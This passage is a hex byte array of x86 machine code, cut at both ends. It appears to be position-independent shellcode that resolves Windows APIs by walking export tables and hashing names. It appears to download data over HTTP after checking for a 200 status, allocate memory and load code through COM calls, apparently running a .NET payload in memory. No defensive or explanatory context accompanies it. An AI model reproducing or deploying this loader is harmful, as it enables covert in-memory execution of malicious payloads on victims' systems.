158 0x84, 0x24, 0x7c, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x10, 0x06, 0x00,
159 0x00, 0x50, 0x51, 0xff, 0x97, 0x94, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85,
160 0xed, 0x0f, 0x84, 0xca, 0x00, 0x00, 0x00, 0x39, 0x74, 0x24, 0x14, 0x74,
161 0x20, 0xf7, 0xc3, 0x00, 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d,
162 0x44, 0x24, 0x20, 0xc7, 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50,
163 0x6a, 0x1f, 0x55, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x56, 0x56, 0x56,
164 0x56, 0x55, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
165 0x8a, 0x00, 0x00, 0x00, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24,
166 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x68,
167 0x13, 0x00, 0x00, 0x20, 0x55, 0xff, 0x97, 0x9c, 0x00, 0x00, 0x00, 0x85,
168 0xc0, 0x74, 0x67, 0x81, 0x7c, 0x24, 0x18, 0xc8, 0x00, 0x00, 0x00, 0x75,
169 0x5d, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
170 0x00, 0x00, 0x50, 0x8d, 0x9f, 0x40, 0x07, 0x00, 0x00, 0x53, 0x68, 0x05,
171 0x00, 0x00, 0x20, 0x55, 0x89, 0x33, 0x89, 0x73, 0x04, 0xff, 0x97, 0x9c,
172 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04,
173 0x74, 0x2c, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x56,
174 0xff, 0x57, 0x3c, 0x89, 0x87, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74,
175 0x15, 0x8d, 0x4c, 0x24, 0x20, 0x89, 0x74, 0x24, 0x20, 0x51, 0xff, 0x33,
176 0x50, 0x55, 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0xf0, 0x55, 0xff,
177 0x97, 0x90, 0x00, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90,
178 0x00, 0x00, 0x00, 0x5d, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, 0x00,
179 0x00, 0x00, 0x85, 0xf6, 0x74, 0x45, 0xff, 0xb7, 0x40, 0x07, 0x00, 0x00,
180 0x8b, 0x9f, 0x48, 0x07, 0x00, 0x00, 0x8d, 0x87, 0x30, 0x07, 0x00, 0x00,
181 0x53, 0x50, 0x8d, 0x87, 0x20, 0x07, 0x00, 0x00, 0x50, 0xe8, 0x0e, 0x14,
182 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8d, 0x87, 0x18, 0x06, 0x00, 0x00, 0xff,
183 0x77, 0x28, 0x50, 0xe8, 0xd7, 0x12, 0x00, 0x00, 0x83, 0xc4, 0x1c, 0x3b,
184 0x83, 0x08, 0x19, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x93, 0x0c, 0x19, 0x00,
185 0x00, 0x75, 0x04, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5e, 0x5b,
186 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0xdc, 0x01, 0x00,
187 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, 0x57,
188 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78, 0x85, 0xc0, 0x0f, 0x84, 0xe5,
189 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b, 0x5f, 0x18, 0x85, 0xdb, 0x0f,
190 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33, 0xd2, 0x03, 0xc6,
191 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x24, 0x8b, 0x47, 0x20, 0x03,
192 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47, 0x24, 0x03, 0xc6, 0x89, 0x44,
193 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6, 0x8a, 0x08, 0x84, 0xc9, 0x74,
194 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94, 0x24, 0xe8, 0x00, 0x00, 0x00,
195 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88, 0x0c, 0x02, 0x40, 0x8a, 0x08,
196 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24, 0x10, 0x8b, 0xb4, 0x24, 0xf4,
197 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
198 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x84, 0x14,
199 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00,
200 0x50, 0xe8, 0x0d, 0x12, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24, 0x83, 0xc4,
201 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc, 0x89, 0x54, 0x24, 0x1c,
202 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
203 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x03,
204 0xce, 0x51, 0xe8, 0xdc, 0x11, 0x00, 0x00, 0x33, 0x44, 0x24, 0x24, 0x83,
205 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84, 0x24, 0xf8, 0x01, 0x00,
206 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01, 0x00, 0x00, 0x74, 0x1d,
207 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89, 0x44, 0x24, 0x10, 0x83,
208 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4,
209 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x8b, 0x4c, 0x24,
210 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0x3b,
211 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c, 0x03, 0xc7, 0x3b, 0xc8, 0x73,
212 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e, 0x8d, 0x7c, 0x24, 0x28, 0x8b,
213 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73, 0x11, 0x8a, 0x06, 0x88, 0x04,
214 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42, 0x46, 0x80, 0x3e, 0x00, 0x75,
215 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c, 0x6c, 0x00, 0x42, 0x03, 0xca,
216 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d, 0x74, 0x24, 0x68, 0x2b, 0xf1,
217 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41,
218 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00,
219 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44, 0x14, 0x6c, 0x00, 0xff, 0x56,
220 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c, 0x24, 0x68, 0x51, 0x50, 0xff,
221 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x8b, 0xc1, 0xe9, 0x5b,
222 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b,
223 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
224 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
225 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c, 0x8b, 0x4e, 0x14, 0x85, 0xc9,
226 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x14, 0x8b,
227 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
228 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
229 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c, 0x8b, 0x4e, 0x08, 0x85, 0xc9,
230 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x2c, 0x8b, 0x46, 0x08, 0x50,
231 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e, 0x08, 0x8b, 0x4e, 0x04, 0x85,
232 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x04,
233 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
234 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83, 0xc0, 0x10,
235 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01, 0x40, 0x00,
236 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x10, 0x00,
237 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x8b, 0x44, 0x24, 0x04,
238 0xff, 0x74, 0x24, 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff,
239 0x74, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00,
240 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24,
241 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16,
242 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff,
243 0x51, 0x04, 0x8b, 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2,
244 0x10, 0x00, 0x8b, 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03,
245 0x40, 0x00, 0x80, 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
246 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45,
247 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75,
248 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff,
249 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x42, 0x0f,
250 0x00, 0x00, 0x8b, 0x74, 0x24, 0x14, 0xb9, 0x13, 0x1e, 0x40, 0x00, 0xbf,
251 0xe4, 0x2a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08,
252 0xe8, 0x27, 0x0f, 0x00, 0x00, 0xb9, 0xe5, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
253 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x14, 0x0f, 0x00, 0x00,
254 0xb9, 0x9c, 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
255 0x48, 0x08, 0xe8, 0x01, 0x0f, 0x00, 0x00, 0xb9, 0x5a, 0x1b, 0x40, 0x00,
256 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xee, 0x0e,
257 0x00, 0x00, 0xb9, 0x30, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
258 0x06, 0x89, 0x48, 0x10, 0xe8, 0xdb, 0x0e, 0x00, 0x00, 0xb9, 0x0c, 0x1b,
259 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8,
260 0xc8, 0x0e, 0x00, 0x00, 0xb9, 0x74, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
261 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8, 0xb5, 0x0e, 0x00, 0x00, 0xb9,
262 0x71, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
263 0x1c, 0xe8, 0xa2, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
264 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x8f, 0x0e, 0x00,
265 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
266 0x89, 0x48, 0x24, 0xe8, 0x7c, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
267 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x28, 0xe8, 0x69,
268 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
269 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0x56, 0x0e, 0x00, 0x00, 0xb9, 0x04,
270 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x30,
271 0xe8, 0x43, 0x0e, 0x00, 0x00, 0xb9, 0x84, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
272 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34, 0xe8, 0x30, 0x0e, 0x00, 0x00,
273 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
274 0x48, 0x38, 0xe8, 0x1d, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
275 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x3c, 0xe8, 0x0a, 0x0e,
276 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
277 0x06, 0x89, 0x48, 0x40, 0xe8, 0xf7, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
278 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x44, 0xe8,
279 0xe4, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
280 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8, 0xd1, 0x0d, 0x00, 0x00, 0xb9,
281 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
282 0x4c, 0xe8, 0xbe, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
283 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x50, 0xe8, 0xab, 0x0d, 0x00,
284 0x00, 0xb9, 0xfc, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
285 0x89, 0x48, 0x54, 0xe8, 0x98, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
286 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x58, 0xe8, 0x85,
287 0x0d, 0x00, 0x00, 0xb9, 0x28, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
288 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0x72, 0x0d, 0x00, 0x00, 0xb9, 0x04,
289 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x60,
290 0xe8, 0x5f, 0x0d, 0x00, 0x00, 0xb9, 0xac, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
291 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64, 0xe8, 0x4c, 0x0d, 0x00, 0x00,
292 0xb9, 0xf4, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
293 0x48, 0x68, 0xe8, 0x39, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
294 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x6c, 0xe8, 0x26, 0x0d,
295 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
296 0x06, 0x89, 0x48, 0x70, 0xe8, 0x13, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
297 0x40, 0x00, 0x8d, 0x5e, 0x04, 0x2b, 0xcf, 0x8b, 0x7c, 0x24, 0x10, 0x03,
298 0xc8, 0x8b, 0x06, 0x53, 0x89, 0x48, 0x74, 0x8d, 0x87, 0xdc, 0x03, 0x00,
299 0x00, 0x83, 0x66, 0x10, 0x00, 0x50, 0x89, 0x7e, 0x14, 0xff, 0x57, 0x78,
300 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87,
301 0x8c, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f,
302 0x5e, 0x5b, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8,
303 0x03, 0x40, 0x00, 0x80, 0xeb, 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33,
304 0xc9, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84,
305 0x8f, 0xfc, 0x03, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83,
306 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x0c,
307 0x04, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04,
308 0x75, 0xee, 0xeb, 0x14, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x8c, 0x04, 0x00,
309 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee,
310 0x89, 0x32, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40,
311 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04,
312 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08,
313 0xff, 0x51, 0x38, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04,
314 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00,
315 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff,
316 0x50, 0x4c, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x83, 0xec, 0x14, 0x53, 0x8b,
317 0x5c, 0x24, 0x1c, 0x55, 0x56, 0x57, 0x33, 0xff, 0x8d, 0xab, 0x48, 0x07,
318 0x00, 0x00, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8b, 0xc7, 0x89,
319 0x7c, 0x24, 0x10, 0x74, 0x03, 0x8b, 0x6d, 0x00, 0x8b, 0x8b, 0xa4, 0x00,
320 0x00, 0x00, 0x8b, 0x74, 0x24, 0x2c, 0x85, 0xc9, 0x0f, 0x84, 0xc5, 0x01,
321 0x00, 0x00, 0x56, 0x8d, 0x83, 0x2c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83,
322 0x1c, 0x04, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0x89,
323 0x01, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x7e, 0x04, 0x57, 0x8d, 0x83, 0x3c,
324 0x04, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x8d, 0x45, 0x04, 0x50, 0x52, 0xff,
325 0x51, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0x62, 0x01, 0x00, 0x00, 0x8b, 0x07,
326 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
327 0xc0, 0x0f, 0x88, 0x5c, 0x01, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x14, 0x00,
328 0x74, 0x1a, 0x8b, 0x0f, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x83, 0x5c, 0x04,
329 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83, 0x4c, 0x04, 0x00, 0x00, 0x50,
330 0x51, 0xff, 0x52, 0x24, 0x33, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x33, 0x01,
331 0x00, 0x00, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
332 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00, 0x00, 0x8d, 0x85, 0x04, 0x02, 0x00,
333 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0x56, 0x08, 0x8b, 0xf8, 0x8d, 0x46,
334 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0x89, 0x44, 0x24, 0x28,
335 0xff, 0x51, 0x30, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x85, 0xf6, 0x0f,
336 0x88, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x18, 0x8b, 0x74, 0x24,
337 0x2c, 0x8b, 0x12, 0x8d, 0x46, 0x10, 0x50, 0x8d, 0x83, 0x6c, 0x04, 0x00,
338 0x00, 0x8b, 0x0a, 0x50, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f, 0x88, 0xb5,
339 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x85, 0x10, 0x19,
340 0x00, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x6a,
341 0x01, 0x6a, 0x11, 0xff, 0x53, 0x58, 0x8b, 0xf8, 0x85, 0xff, 0x0f, 0x84,
342 0x90, 0x00, 0x00, 0x00, 0x8b, 0x57, 0x0c, 0x33, 0xc0, 0x8b, 0xc8, 0x39,
343 0x85, 0x14, 0x19, 0x00, 0x00, 0x72, 0x2d, 0x77, 0x08, 0x39, 0x85, 0x10,
344 0x19, 0x00, 0x00, 0x76, 0x23, 0x33, 0xdb, 0x8a, 0x84, 0x29, 0x18, 0x19,
345 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x9d, 0x14, 0x19, 0x00, 0x00,
346 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
347 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0x4e, 0x10, 0x8d, 0x46, 0x14, 0x50, 0x57,
348 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b,
349 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x47,
350 0x0c, 0x39, 0x95, 0x14, 0x19, 0x00, 0x00, 0x72, 0x27, 0x77, 0x08, 0x39,
351 0x95, 0x10, 0x19, 0x00, 0x00, 0x76, 0x1d, 0x88, 0x94, 0x29, 0x18, 0x19,
352 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x95, 0x14, 0x19, 0x00, 0x00,
353 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
354 0x57, 0xff, 0x53, 0x64, 0x8b, 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b,
355 0x83, 0xc4, 0x14, 0xc3, 0x83, 0x27, 0x00, 0xe9, 0xcc, 0xfe, 0xff, 0xff,
356 0x89, 0x3e, 0xe9, 0xc7, 0xfe, 0xff, 0xff, 0x33, 0xff, 0x8d, 0x46, 0x08,
357 0x50, 0x8d, 0x83, 0x5c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x4c, 0x04,
358 0x00, 0x00, 0x50, 0x57, 0x57, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x85,
359 0xc0, 0x0f, 0x89, 0xab, 0xfe, 0xff, 0xff, 0x89, 0x7e, 0x08, 0x33, 0xc0,
360 0xeb, 0xbe, 0x83, 0xec, 0x6c, 0x53, 0x8b, 0x5c, 0x24, 0x74, 0x33, 0xc0,
361 0x55, 0x56, 0x57, 0x8d, 0x7c, 0x24, 0x3c, 0x33, 0xed, 0x21, 0x6c, 0x24,
362 0x14, 0x8d, 0xb3, 0x48, 0x07, 0x00, 0x00, 0xab, 0xab, 0xab, 0xab, 0x33,
363 0xc0, 0x66, 0x89, 0x44, 0x24, 0x10, 0x40, 0x39, 0x83, 0x0c, 0x05, 0x00,
364 0x00, 0x74, 0x02, 0x8b, 0x36, 0x83, 0x3e, 0x02, 0x0f, 0x85, 0x64, 0x01,
365 0x00, 0x00, 0x8b, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x48, 0x14,
366 0x8d, 0x78, 0x1c, 0x57, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0,
367 0x0f, 0x88, 0x41, 0x01, 0x00, 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x14,
368 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0x4e,
369 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x6a, 0x01, 0xff, 0x74,
370 0x24, 0x1c, 0xff, 0x53, 0x68, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x6a, 0x01,
371 0xff, 0x74, 0x24, 0x1c, 0xff, 0x53, 0x6c, 0x8b, 0x44, 0x24, 0x20, 0x2b,
372 0x44, 0x24, 0x24, 0x83, 0xc0, 0x01, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00,
373 0x6a, 0x01, 0x6a, 0x00, 0x6a, 0x0c, 0xff, 0x53, 0x5c, 0x8b, 0xe8, 0x33,
374 0xc9, 0x39, 0x8e, 0x04, 0x08, 0x00, 0x00, 0xb8, 0x08, 0x20, 0x00, 0x00,
375 0x66, 0x89, 0x44, 0x24, 0x2c, 0x74, 0x58, 0xff, 0xb6, 0x04, 0x08, 0x00,
376 0x00, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x89, 0x44, 0x24, 0x34, 0x33,
377 0xc0, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x39, 0x86, 0x04, 0x08,
378 0x00, 0x00, 0x76, 0x63, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00,
379 0x03, 0xc6, 0x50, 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00,
380 0x00, 0x00, 0x50, 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x8b, 0x84,
381 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
382 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xcb, 0xeb, 0x2c, 0x6a,
383 0x01, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x83, 0xa4, 0x24, 0x80, 0x00,
384 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x34, 0x8d, 0x44, 0x24, 0x10, 0x50,
